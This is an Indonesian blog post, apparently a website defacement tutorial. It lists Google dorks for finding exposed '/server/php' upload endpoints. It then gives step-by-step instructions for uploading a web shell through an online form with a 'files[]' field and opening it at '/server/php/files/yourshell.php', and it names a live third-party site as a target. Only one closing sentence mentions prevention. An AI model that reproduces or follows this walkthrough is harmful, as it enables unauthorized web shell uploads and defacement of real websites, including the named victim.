Deface Poc Vulnerability Image Dork

Hallo Gaess , welcome back dengan Mimin :v . Teknik ini sebenarnya old dan banyak dijumpai tapi ya gw pengen share aja ke kalian semua , langsung aja no basa basi .
Cara Eksekusi Vulnerability Proof Of Concept (POC) Image Dork 
Dork : - inurl:admin/server/php ext:jpg
           - inurl:/server/php ext:jpg
           - allinurl:cms/server/php ext:jpg
           - allinurl:blog/server/php ext:jpg
           - allinurl:news/server/php ext:jpg
           - allinurl:news/server/php ext:jpg site:com
            Use Your Brain Fucking Bitch !
Exploit : localhost.com/[path]/server/php
CSRF Online : - Touch Me :* Senpaii
                       - Touch Me :* Onichann
                       - Touch Me :*

Step : 

1.Dorking Dulu Cok Di Google -> Gambar 

2.Pilih Salah Satu Web -> Klik Gambar / Klik Ikon Browser

3.Setelah Itu Tekan Ctrl + U Atau Bisa Juga view-source:site.com Dan Tekan "F" Agar Gampang Mencari "server/php" Dalam Source Web Korban


4.Kemudian Copy Link Tersebut Dan Klik New Tab / Ctrl + T , Setelah Itu Paste Link Yang Tadi Di Copy

5.Lalu Masukkan Exploit Tadi Dengan Menyisakan /server/php
Note:Jika Vuln Seperti Gambar Dibawah , Kalau Forbidden / NotFound / Blank Cari Web Lain

6.Buka CSRF Online
7.Input Type Post : files[]

8.Lalu Masukan Web Vuln Tadi, dan Duoor Berhasil^_^



9. Access Your Shell: http:site.com/[path]/server/php/files/yourshell.php


Live Target : http://www.manciniprop.com.ar/admin/server/php/


Sebagian besar teknik Mencegah serangan ini bisa dengan menanamkan data otentikasi tambahan ke dalam request server.

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel